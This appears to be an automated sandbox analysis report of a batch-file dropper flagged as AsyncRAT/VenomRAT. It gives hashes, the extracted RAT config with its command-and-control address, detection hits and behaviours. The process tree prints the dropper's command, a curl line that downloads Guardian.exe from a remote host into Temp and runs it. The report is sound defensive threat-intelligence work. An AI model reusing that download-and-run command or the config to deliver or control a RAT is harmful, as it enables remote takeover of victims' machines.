asyncrat | f1db00b7e0d7875ad7b2c4c39e9902f68b17d5326697b3a49b640fd95753f7a3

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2025 16:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lmfao.bat
Size

330B
MD5

ddba1745786f39ba4ae9198510aea429
SHA1

71f4136708be24a03401e2afdf72fb968be3ab9b
SHA256

f1db00b7e0d7875ad7b2c4c39e9902f68b17d5326697b3a49b640fd95753f7a3
SHA512

507359003cc75b17a74a444505b8e2378664e35ca7e6b605564ec000250c5855d296b0d1dae724047a678b5a6236a9923af0f3f9b9395957aa1969b1fdda71eb

Score

10^/10

asyncrat venomrat default discovery rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

195.88.218.126:2404

Mutex

rtyjmmoinnphou

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/files/0x000d000000023b49-2.dat	VenomRAT
behavioral2/memory/1508-5-0x00000000009D0000-0x00000000009E8000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000d000000023b49-2.dat	family_asyncrat

Downloads MZ/PE file 1 IoCs

flow	pid	Process
3	1856	curl.exe

Executes dropped EXE 1 IoCs

pid	Process
1508	Guardian.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1508	Guardian.exe
1508	Guardian.exe
1508	Guardian.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1508	Guardian.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1508	Guardian.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 4148	1912	cmd.exe	84
PID 1912 wrote to memory of 4148	1912	cmd.exe	84
PID 4148 wrote to memory of 1856	4148	cmd.exe	85
PID 4148 wrote to memory of 1856	4148	cmd.exe	85
PID 4148 wrote to memory of 1508	4148	cmd.exe	86
PID 4148 wrote to memory of 1508	4148	cmd.exe	86

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lmfao.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Windows\system32\cmd.exe
  cmd /V /C "set u=http://195.88.218.126:8000/Guardian.exe&set p=C:\Users\Admin\AppData\Local\Temp\Guardian.exe&curl --insecure -o !p! !u! && start !p!"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4148
- - C:\Windows\system32\curl.exe
    curl --insecure -o C:\Users\Admin\AppData\Local\Temp\Guardian.exe http://195.88.218.126:8000/Guardian.exe
    3⤵
    - Downloads MZ/PE file
    PID:1856
- - C:\Users\Admin\AppData\Local\Temp\Guardian.exe
    C:\Users\Admin\AppData\Local\Temp\Guardian.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Guardian.exe

Filesize
74KB

MD5
0abfd67ab1f218e329437a4384e622a1

SHA1
6f5e998f2cc0ad3817e2b52ca837a539e67d4e8c

SHA256
9eb0d6b9fda7bfb060c8d235124005300b3daee042c19ab2875ac61a0f05e6b8

SHA512
922c5ff4ade837e56a6482687c678e081cd94a759533b38b5820e8424bace03fac6d9c9212bf9c744845bfb4089b65cf950a5e7f9e871130fc8dd22e60a516ff

Download Submit
memory/1508-4-0x00007FFE23383000-0x00007FFE23385000-memory.dmp

Filesize
8KB

Download
memory/1508-5-0x00000000009D0000-0x00000000009E8000-memory.dmp

Filesize
96KB

Download
memory/1508-7-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-8-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-11-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-12-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-14-0x00007FFE23383000-0x00007FFE23385000-memory.dmp

Filesize
8KB

Download
memory/1508-15-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-16-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-17-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download
memory/1508-18-0x00007FFE23380000-0x00007FFE23E41000-memory.dmp

Filesize
10.8MB

Download